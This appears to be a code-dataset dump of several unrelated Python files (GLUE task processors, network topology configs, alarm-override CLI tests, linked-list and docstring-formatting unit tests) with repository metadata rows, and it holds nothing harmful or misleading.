def get_dev(self, path: str):
return self.parse_sst2_dataset(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_sst2_dataset(read_table(os.path.join(path, "test.tsv")), True)
def get_label_to_index(self):
return {"0": 0, "1": 1}
@tf.function
def update_state(self, targets, preds, validation=False):
if validation:
self.val_acc.update_state(targets, preds)
else:
self.acc.update_state(targets, preds)
def get_metrics(self, validation=False):
if validation:
return {"Acc": self.val_acc.result()}
return {"Acc": self.acc.result()}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
else:
self.acc.reset_states()
def get_hash(self):
return f"{self.val_acc.result():.4f}"
def get_key(self):
return self.val_acc.result()
@staticmethod
def parse_sst2_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str]]:
"""
Parse SST-2 Dataset (GLUE)
"""
# dataset files have a header row
lines = lines[1:]
if is_test:
return None, [line[1] for line in lines]
return [line[1] for line in lines], [line[0] for line in lines]
class RTEProcessor(GLUEClassificationProcessor):
def __init__(self):
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
def get_train(self, path: str):
return self.parse_rte_data(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_rte_data(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_rte_data(read_table(os.path.join(path, "test.tsv")), True)
def get_label_to_index(self):
return {"not_entailment": 0, "entailment": 1}
@tf.function
def update_state(self, targets, preds, validation=False):
if validation:
self.val_acc.update_state(targets, preds)
else:
self.acc.update_state(targets, preds)
def get_metrics(self, validation=False):
if validation:
return {"Acc": self.val_acc.result()}
return {"Acc": self.acc.result()}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
else:
self.acc.reset_states()
def get_hash(self):
return f"{self.val_acc.result():.4f}"
def get_key(self):
return self.val_acc.result()
@staticmethod
def parse_rte_data(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
"""
Parse RTE Dataset (GLUE)
"""
# dataset files have a header row
lines = lines[1:]
if is_test:
return None, [line[1] for line in lines], [line[2] for line in lines]
return [line[3] for line in lines], [line[1] for line in lines], [line[2] for line in lines]
class QQPProcessor(GLUEClassificationProcessor):
def __init__(self):
self.acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.f1 = F1Score()
self.val_acc = tf.keras.metrics.SparseCategoricalAccuracy()
self.val_f1 = F1Score()
def get_train(self, path: str):
return self.parse_qqp_dataset(read_table(os.path.join(path, "train.tsv")), False)
def get_dev(self, path: str):
return self.parse_qqp_dataset(read_table(os.path.join(path, "dev.tsv")), False)
def get_test(self, path: str):
return self.parse_qqp_dataset(read_table(os.path.join(path, "train.tsv")), True)
def get_label_to_index(self):
return {"1": 1, "0": 0}
@tf.function
def update_state(self, targets, preds, validation=False):
maxed_preds = tf.math.argmax(preds, -1)
if validation:
self.val_acc.update_state(targets, preds)
self.val_f1.update_state(targets, maxed_preds)
else:
self.acc.update_state(targets, preds)
self.f1.update_state(targets, maxed_preds)
def get_metrics(self, validation=False):
if validation:
return {
"Acc": self.val_acc.result(),
"F1": self.val_f1.result(),
}
return {
"Acc": self.acc.result(),
"F1": self.f1.result(),
}
def reset_states(self, validation=False):
if validation:
self.val_acc.reset_states()
self.val_f1.reset_states()
else:
self.acc.reset_states()
self.f1.reset_states()
def get_hash(self):
return f"{self.val_acc.result():.4f}"
def get_key(self):
return self.val_acc.result()
@staticmethod
def parse_qqp_dataset(lines: List[List[str]], is_test: bool) -> Tuple[Optional[List[str]], List[str], List[str]]:
"""
Parse QQP Dataset (GLUE)
"""
# dataset files have a header row
lines = [line for line in lines[1:] if len(line) == 6]
if is_test:
return None, [line[3] for line in lines], [line[4] for line in lines]
return [line[-1] for line in lines], [line[3] for line in lines], [line[4] for line in lines]
| 32.754678 | 118 | 0.626595 | 2,082 | 15,755 | 4.56244 | 0.077329 | 0.030951 | 0.036846 | 0.039794 | 0.878935 | 0.85209 | 0.833667 | 0.810296 | 0.759764 | 0.743657 | 0 | 0.011716 | 0.246969 | 15,755 | 480 | 119 | 32.822917 | 0.788941 | 0.026277 | 0 | 0.718475 | 0 | 0 | 0.032613 | 0.012716 | 0 | 0 | 0 | 0 | 0.008798 | 1 | 0.231672 | false | 0 | 0.020528 | 0.105572 | 0.457478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
9546d2d2a3e85e23c6938bc050fae0c6a0097f6c | 2,497 | py | Python | basic_utils/options.py | hzxsnczpku/banrinochoujou | 9e04bc5c561ab674fd10e4991aa4b5ae86364f6c | [
"MIT"
] | 9 | 2017-10-22T07:27:02.000Z | 2019-12-23T08:01:28.000Z | basic_utils/options.py | hzxsnczpku/banrinochoujou | 9e04bc5c561ab674fd10e4991aa4b5ae86364f6c | [
"MIT"
] | null | null | null | basic_utils/options.py | hzxsnczpku/banrinochoujou | 9e04bc5c561ab674fd10e4991aa4b5ae86364f6c | [
"MIT"
] | 1 | 2017-10-31T10:44:04.000Z | 2017-10-31T10:44:04.000Z | """
Here are some default network structures as well as
some lists containing the names of different agents and environments.
"""
net_topology_pol_vec = [
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
]
net_topology_v_vec = [
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
]
net_topology_q_vec = [
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
# {'kind': 'dense', 'units': 64},
# {'kind': 'ReLU'},
]
net_topology_q_dropout_vec = [
{'kind': 'dense', 'units': 24},
{'kind': 'ReLU'},
{'kind': 'Dropout', 'p': 0.1},
{'kind': 'dense', 'units': 24},
{'kind': 'ReLU'},
{'kind': 'Dropout', 'p': 0.1}
# {'kind': 'dense', 'units': 64},
# {'kind': 'ReLU'},
]
net_topology_pol_det_vec = [
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
]
net_topology_q_det_vec = [
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
]
net_topology_merge_det_vec = [
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
{'kind': 'dense', 'units': 64},
{'kind': 'Tanh'},
]
net_topology_det_vec = [net_topology_pol_det_vec, net_topology_q_det_vec, net_topology_merge_det_vec]
net_topology_pol_fig = [
{'kind': 'conv', 'filters': 32, 'stride': 4, 'ker_size': 8},
{'kind': 'Tanh'},
{'kind': 'conv', 'filters': 64, 'stride': 2, 'ker_size': 4},
{'kind': 'Tanh'},
{'kind': 'conv', 'filters': 64, 'stride': 1, 'ker_size': 3},
{'kind': 'flatten'},
{'kind': 'dense', 'units': 512},
{'kind': 'Tanh'},
]
net_topology_v_fig = [
{'kind': 'conv', 'filters': 32, 'stride': 4, 'ker_size': 8},
{'kind': 'Tanh'},
{'kind': 'conv', 'filters': 64, 'stride': 2, 'ker_size': 4},
{'kind': 'Tanh'},
{'kind': 'conv', 'filters': 64, 'stride': 1, 'ker_size': 3},
{'kind': 'flatten'},
{'kind': 'dense', 'units': 512},
{'kind': 'Tanh'},
]
net_topology_q_fig = [
{'kind': 'conv', 'filters': 32, 'stride': 4, 'ker_size': 8},
{'kind': 'Tanh'},
{'kind': 'conv', 'filters': 64, 'stride': 2, 'ker_size': 4},
{'kind': 'Tanh'},
{'kind': 'conv', 'filters': 64, 'stride': 1, 'ker_size': 3},
{'kind': 'flatten'},
{'kind': 'dense', 'units': 512},
{'kind': 'Tanh'},
]
| 26.284211 | 101 | 0.50821 | 305 | 2,497 | 3.970492 | 0.160656 | 0.138728 | 0.219653 | 0.184971 | 0.895128 | 0.819983 | 0.819983 | 0.819983 | 0.787779 | 0.786127 | 0 | 0.041075 | 0.210252 | 2,497 | 94 | 102 | 26.56383 | 0.573022 | 0.088907 | 0 | 0.693333 | 0 | 0 | 0.326855 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9551621af2cc0ceb2fdb0db3c8a70ced9245db00 | 8,930 | py | Python | tests/test_override.py | JeffersonLab/kafka-alarm-scripts | e8bdc5dc5079be828825b7f8c21e2a3aea1cd4e1 | [
"MIT"
] | null | null | null | tests/test_override.py | JeffersonLab/kafka-alarm-scripts | e8bdc5dc5079be828825b7f8c21e2a3aea1cd4e1 | [
"MIT"
] | null | null | null | tests/test_override.py | JeffersonLab/kafka-alarm-scripts | e8bdc5dc5079be828825b7f8c21e2a3aea1cd4e1 | [
"MIT"
] | null | null | null | import time
from click.testing import CliRunner
from jaws_libp.avro.serde import OverrideSerde, OverrideKeySerde
from jaws_libp.entities import AlarmOverrideUnion, LatchedOverride, AlarmOverrideKey, OverriddenAlarmType, \
MaskedOverride, DisabledOverride, FilteredOverride, ShelvedOverride, ShelvedReason, OnDelayedOverride, \
OffDelayedOverride
from jaws_scripts.client.list_overrides import list_overrides
from jaws_scripts.client.set_override import set_override
def test_latched_override():
alarm_name = "alarm1"
override_type = OverriddenAlarmType.Latched
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(LatchedOverride())
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_masked_override():
alarm_name = "alarm1"
override_type = OverriddenAlarmType.Masked
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(MaskedOverride())
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_disabled_override():
alarm_name = "alarm1"
comments = "Out of Service"
override_type = OverriddenAlarmType.Disabled
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(DisabledOverride(comments))
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name, '--comments', comments])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_filtered_override():
alarm_name = "alarm1"
filter = "Area"
override_type = OverriddenAlarmType.Filtered
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(FilteredOverride(filter))
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name, '--filtername', filter])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_continuous_shelved_override():
alarm_name = "alarm1"
expiration_seconds = 15
expiration_ts = int(time.time() + expiration_seconds) * 1000
reason = ShelvedReason.Stale_Alarm
oneshot = False
comments = "Just until I hear back from tech"
override_type = OverriddenAlarmType.Shelved
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(ShelvedOverride(expiration_ts, comments, reason, oneshot))
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
'--expirationts', expiration_ts, '--comments', comments,
'--reason', reason.name])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_oneshot_shelved_override():
alarm_name = "alarm1"
expiration_seconds = 15
expiration_ts = int(time.time() + expiration_seconds) * 1000
reason = ShelvedReason.Stale_Alarm
oneshot = True
comments = "Just until I hear back from tech"
override_type = OverriddenAlarmType.Shelved
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(ShelvedOverride(expiration_ts, comments, reason, oneshot))
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
'--expirationts', expiration_ts, '--comments', comments,
'--reason', reason.name, '--oneshot'])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_on_delayed_override():
alarm_name = "alarm1"
expiration_seconds = 15
expiration_ts = int(time.time() + expiration_seconds) * 1000
override_type = OverriddenAlarmType.OnDelayed
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(OnDelayedOverride(expiration_ts))
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
'--expirationts', expiration_ts])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
def test_off_delayed_override():
alarm_name = "alarm1"
expiration_seconds = 15
expiration_ts = int(time.time() + expiration_seconds) * 1000
override_type = OverriddenAlarmType.OffDelayed
override_key = AlarmOverrideKey(alarm_name, override_type)
override = AlarmOverrideUnion(OffDelayedOverride(expiration_ts))
runner = CliRunner()
try:
# Set
result = runner.invoke(set_override, [alarm_name, '--override', override_type.name,
'--expirationts', expiration_ts])
assert result.exit_code == 0
# Get
result = runner.invoke(list_overrides, ['--export'])
assert result.exit_code == 0
override_serde = OverrideSerde(None)
key_serde = OverrideKeySerde(None)
assert result.output == key_serde.to_json(override_key) + '=' + override_serde.to_json(override) + '\n'
finally:
# Clear
result = runner.invoke(set_override, [alarm_name, '--unset', '--override', override_type.name])
assert result.exit_code == 0
| 36.008065 | 116 | 0.656327 | 934 | 8,930 | 6.033191 | 0.09743 | 0.051109 | 0.072405 | 0.085182 | 0.85732 | 0.85732 | 0.85732 | 0.838154 | 0.838154 | 0.759361 | 0 | 0.008205 | 0.235722 | 8,930 | 247 | 117 | 36.153846 | 0.817436 | 0.01243 | 0 | 0.783133 | 0 | 0 | 0.063339 | 0 | 0 | 0 | 0 | 0 | 0.192771 | 1 | 0.048193 | false | 0 | 0.036145 | 0 | 0.084337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
959cb97354ce6ee439ee7077076a182ddb01336c | 1,910 | py | Python | Problems/2/return_kth_to_last/test_kth_to_last.py | weezybusy/Cracking-the-Coding-Interview | 22b8f62c97781ea5aa388434d75ad5abde42c85a | [
"MIT"
] | null | null | null | Problems/2/return_kth_to_last/test_kth_to_last.py | weezybusy/Cracking-the-Coding-Interview | 22b8f62c97781ea5aa388434d75ad5abde42c85a | [
"MIT"
] | null | null | null | Problems/2/return_kth_to_last/test_kth_to_last.py | weezybusy/Cracking-the-Coding-Interview | 22b8f62c97781ea5aa388434d75ad5abde42c85a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import unittest
from singly_linked_list import Node, SinglyLinkedList
from kth_to_last import kth_to_last, kth_to_last_alt, kth_to_last_recur
class TestKthToLast(unittest.TestCase):
def test_kth_to_last(self):
# Positive tests.
lst = SinglyLinkedList()
n = 4
for i in range(n):
lst.insert_tail(Node(i))
for k in range(n):
self.assertEqual(kth_to_last(lst, k).data, n - k - 1)
# Negative tests.
lst = SinglyLinkedList()
n = 4
for i in range(n):
lst.insert_tail(Node(i))
k = -1
self.assertEqual(kth_to_last(lst, k), None)
k = n
self.assertEqual(kth_to_last(lst, k), None)
def test_kth_to_last_alt(self):
# Positive tests.
lst = SinglyLinkedList()
n = 4
for i in range(n):
lst.insert_tail(Node(i))
for k in range(n):
self.assertEqual(kth_to_last_alt(lst, k).data, n - k - 1)
# Negative tests.
lst = SinglyLinkedList()
n = 4
for i in range(n):
lst.insert_tail(Node(i))
k = -1
self.assertEqual(kth_to_last_alt(lst, k), None)
k = n
self.assertEqual(kth_to_last_alt(lst, k), None)
def test_kth_to_last_recur(self):
# Positive tests.
lst = SinglyLinkedList()
n = 4
for i in range(n):
lst.insert_tail(Node(i))
for k in range(n):
self.assertEqual(kth_to_last_recur(lst, k).data, n - k - 1)
# Negative tests.
lst = SinglyLinkedList()
n = 5
for i in range(n):
lst.insert_tail(Node(i))
k = -1
self.assertEqual(kth_to_last_recur(lst, k), None)
k = n
self.assertEqual(kth_to_last_recur(lst, k), None)
if __name__ == '__main__':
unittest.main()
| 23.580247 | 71 | 0.559162 | 268 | 1,910 | 3.757463 | 0.164179 | 0.079444 | 0.142999 | 0.178749 | 0.806356 | 0.790467 | 0.790467 | 0.790467 | 0.750745 | 0.711023 | 0 | 0.010228 | 0.334555 | 1,910 | 80 | 72 | 23.875 | 0.782061 | 0.061257 | 0 | 0.745098 | 0 | 0 | 0.004479 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.137255 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
95a8aa9bc6ffebc51fed1dd76bea56e032a0c36e | 12,156 | py | Python | sectiondoc/tests/test_default_style.py | itziakos/sectiondoc | 427819d60125a2501b4e8e2eac94dee11931dc0c | [
"BSD-3-Clause"
] | null | null | null | sectiondoc/tests/test_default_style.py | itziakos/sectiondoc | 427819d60125a2501b4e8e2eac94dee11931dc0c | [
"BSD-3-Clause"
] | 15 | 2015-02-12T16:04:02.000Z | 2020-11-09T13:53:35.000Z | sectiondoc/tests/test_default_style.py | itziakos/sectiondoc | 427819d60125a2501b4e8e2eac94dee11931dc0c | [
"BSD-3-Clause"
] | 1 | 2019-08-02T09:56:48.000Z | 2019-08-02T09:56:48.000Z | from sectiondoc.styles.default import class_section, function_section
from sectiondoc.tests._compat import unittest
class TestDefaultStyleClass(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def test_refactor_attributes(self):
docstring =\
"""Base abstract docstring refactoring class.
The class' main purpose is to parse the dosctring and find the
sections that need to be refactored. It also provides a number of
methods to help with the refactoring. Subclasses should provide
the methods responsible for refactoring the sections.
Attributes
----------
docstring : list
A list of strings (lines) that holds docstrings
index : int
The current zero-based line number of the docstring that is
proccessed.
"""
rst = \
"""Base abstract docstring refactoring class.
The class' main purpose is to parse the dosctring and find the
sections that need to be refactored. It also provides a number of
methods to help with the refactoring. Subclasses should provide
the methods responsible for refactoring the sections.
.. attribute:: docstring
:annotation: = list
A list of strings (lines) that holds docstrings
.. attribute:: index
:annotation: = int
The current zero-based line number of the docstring that is
proccessed.
"""
docstring_lines = docstring.splitlines()
class_doc = class_section(docstring_lines)
class_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
def test_refactor_methods(self):
docstring = \
""" This is a sample class docstring
Methods
-------
extract_fields(indent='', field_check=None)
Extract the fields from the docstring
get_field()
Get the field description.
get_next_paragraph()
Get the next paragraph designated by an empty line.
"""
rst = \
""" This is a sample class docstring
==================================================================== ===================================================
Method Description
==================================================================== ===================================================
:meth:`extract_fields(indent='', field_check=None) <extract_fields>` Extract the fields from the docstring
:meth:`get_field() <get_field>` Get the field description.
:meth:`get_next_paragraph() <get_next_paragraph>` Get the next paragraph designated by an empty line.
==================================================================== ===================================================
""" # noqa
docstring_lines = docstring.splitlines()
class_doc = class_section(docstring_lines)
class_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
def test_refactor_notes(self):
docstring1 =\
""" This is a sample class docstring
Notes
-----
This is the test.
Wait we have not finished.
This is not a note.
"""
docstring2 =\
""" This is a sample class docstring
Notes
-----
This is the test.
Wait we have not finished.
This is not a note.
"""
rst = \
""" This is a sample class docstring
.. note::
This is the test.
Wait we have not finished.
This is not a note.
"""
docstring_lines = docstring1.splitlines()
class_doc = class_section(docstring_lines)
class_doc.parse()
output = '\n'.join(docstring_lines) + '\n'
self.assertMultiLineEqual(rst, output)
docstring_lines = docstring2.splitlines()
class_doc = class_section(docstring_lines)
class_doc.parse()
output = '\n'.join(docstring_lines) + '\n'
self.assertMultiLineEqual(rst, output)
class TestDefaultStyleFunction(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def test_refactor_returns(self):
docstring = \
""" This is a sample function docstring.
Returns
-------
myvalue : list
A list of important values.
But we need to say more things about it.
"""
rst = \
""" This is a sample function docstring.
:returns:
**myvalue** (*list*) --
A list of important values.
But we need to say more things about it.
"""
docstring_lines = docstring.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
def test_refactor_raises(self):
docstring = \
""" This is a sample function docstring.
Raises
------
TypeError
This is the first paragraph of the description.
More description.
ValueError
Description of another case where errors are raised.
"""
rst = \
""" This is a sample function docstring.
:raises:
- **TypeError** --
This is the first paragraph of the description.
More description.
- **ValueError** --
Description of another case where errors are raised.
"""
docstring_lines = docstring.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
def test_refactor_arguments(self):
docstring =\
""" This is a sample function docstring
Arguments
---------
inputa : str
The first argument holds the first input!.
This is the second paragraph.
inputb : float
The second argument is a float.
the default value is 0.
.. note:: this is an optional value.
"""
rst = \
""" This is a sample function docstring
:param inputa:
The first argument holds the first input!.
This is the second paragraph.
:type inputa: str
:param inputb:
The second argument is a float.
the default value is 0.
.. note:: this is an optional value.
:type inputb: float
"""
docstring_lines = docstring.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines) + '\n'
self.assertMultiLineEqual(rst, output)
def test_refactor_strange_arguments(self):
docstring = \
""" This is a sample function docstring
Parameters
----------
*args
Positional arguments with which this constructor was called
from the enaml source code.
**kwards
Keyword arguments with which this constructor was called
from the enaml source code.
from_
Arguments with trailing underscore.
"""
rst = \
""" This is a sample function docstring
:param \*args:
Positional arguments with which this constructor was called
from the enaml source code.
:param \*\*kwards:
Keyword arguments with which this constructor was called
from the enaml source code.
:param from\_:
Arguments with trailing underscore.
"""
docstring_lines = docstring.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines) + '\n'
self.assertMultiLineEqual(rst, output)
def test_refactor_notes(self):
docstring = \
""" This is a sample function docstring.
Notes
-----
This is the test.
Wait we have not finished.
This should not be included.
"""
rst = \
""" This is a sample function docstring.
.. note::
This is the test.
Wait we have not finished.
This should not be included.
"""
docstring_lines = docstring.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines) + '\n'
self.assertMultiLineEqual(rst, output)
def test_docstring_cases_1(self):
docstring1 = \
""" Sets the selection to the bounds of start and end.
If the indices are invalid, no selection will be made,
and any current selection will be cleared.
Arguments
---------
start : Int
The start selection index, zero based.
end : Int
The end selection index, zero based.
Returns
-------
result : None
"""
docstring2 = \
""" Sets the selection to the bounds of start and end.
If the indices are invalid, no selection will be made,
and any current selection will be cleared.
Arguments
---------
start : Int
The start selection index, zero based.
end : Int
The end selection index, zero based.
Returns
-------
result : None
"""
rst = \
""" Sets the selection to the bounds of start and end.
If the indices are invalid, no selection will be made,
and any current selection will be cleared.
:param start:
The start selection index, zero based.
:type start: Int
:param end:
The end selection index, zero based.
:type end: Int
:returns:
**result** (*None*)
"""
docstring_lines = docstring1.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
docstring_lines = docstring2.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
def test_docstring_cases_2(self):
docstring = \
""" Verify that the requested attribute is properly set
The method compares the attribute value in the Enaml object and
check if it is synchronized with the toolkit widget. The component
attribute is retrieved directly while the widget value is retrieved
through a call to a method function in the test case.
Arguments
---------
component : enaml.widgets.component.Component
The Enaml component to check.
attribute_name : str
The string name of the Enaml attribute to check.
value
The expected value.
.. note:: It is expected that the user has defined an appropriate
method get_<attribute_name>(widget) or the extentded version
get_<attribute_name>(component, widget) in the current test
case. The extended signature is commonly used because additional
information on the component's attributes is required to return
a sensible result (e.g. the component uses Converters to set
and retrieve the value of the attribute). The assert method
The get methods can raise assertion errors when it is not
possible to retrieve a sensible value for the attribute.
"""
rst = \
""" Verify that the requested attribute is properly set
The method compares the attribute value in the Enaml object and
check if it is synchronized with the toolkit widget. The component
attribute is retrieved directly while the widget value is retrieved
through a call to a method function in the test case.
:param component:
The Enaml component to check.
:type component: enaml.widgets.component.Component
:param attribute_name:
The string name of the Enaml attribute to check.
:type attribute_name: str
:param value:
The expected value.
.. note:: It is expected that the user has defined an appropriate
method get_<attribute_name>(widget) or the extentded version
get_<attribute_name>(component, widget) in the current test
case. The extended signature is commonly used because additional
information on the component's attributes is required to return
a sensible result (e.g. the component uses Converters to set
and retrieve the value of the attribute). The assert method
The get methods can raise assertion errors when it is not
possible to retrieve a sensible value for the attribute.
"""
docstring_lines = docstring.splitlines()
function_doc = function_section(docstring_lines)
function_doc.parse()
output = '\n'.join(docstring_lines) + '\n'
self.assertMultiLineEqual(rst, output)
if __name__ == '__main__':
unittest.main()
| 27.013333 | 121 | 0.652188 | 1,473 | 12,156 | 5.291921 | 0.147318 | 0.064657 | 0.01347 | 0.025016 | 0.910455 | 0.891597 | 0.855292 | 0.834638 | 0.807954 | 0.77152 | 0 | 0.001302 | 0.241527 | 12,156 | 449 | 122 | 27.073497 | 0.844143 | 0.000329 | 0 | 0.862745 | 0 | 0 | 0.010431 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.117647 | false | 0 | 0.019608 | 0 | 0.156863 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
95b33e7208e5eba73de5cd1ba035b4bc87afc1d8 | 58 | py | Python | scipy_cut_tree_balanced/__init__.py | v-reyes/ward_cut_tree_balanced | fe9990bb33558dc66dc51d6d205461ca681d8091 | [
"BSD-3-Clause"
] | 8 | 2019-07-25T10:38:28.000Z | 2020-08-27T16:46:59.000Z | scipy_cut_tree_balanced/__init__.py | v-reyes/ward_cut_tree_balanced | fe9990bb33558dc66dc51d6d205461ca681d8091 | [
"BSD-3-Clause"
] | 2 | 2020-12-29T22:35:22.000Z | 2021-05-03T09:45:53.000Z | scipy_cut_tree_balanced/__init__.py | vreyespue/scipy_cut_tree_balanced | fe9990bb33558dc66dc51d6d205461ca681d8091 | [
"BSD-3-Clause"
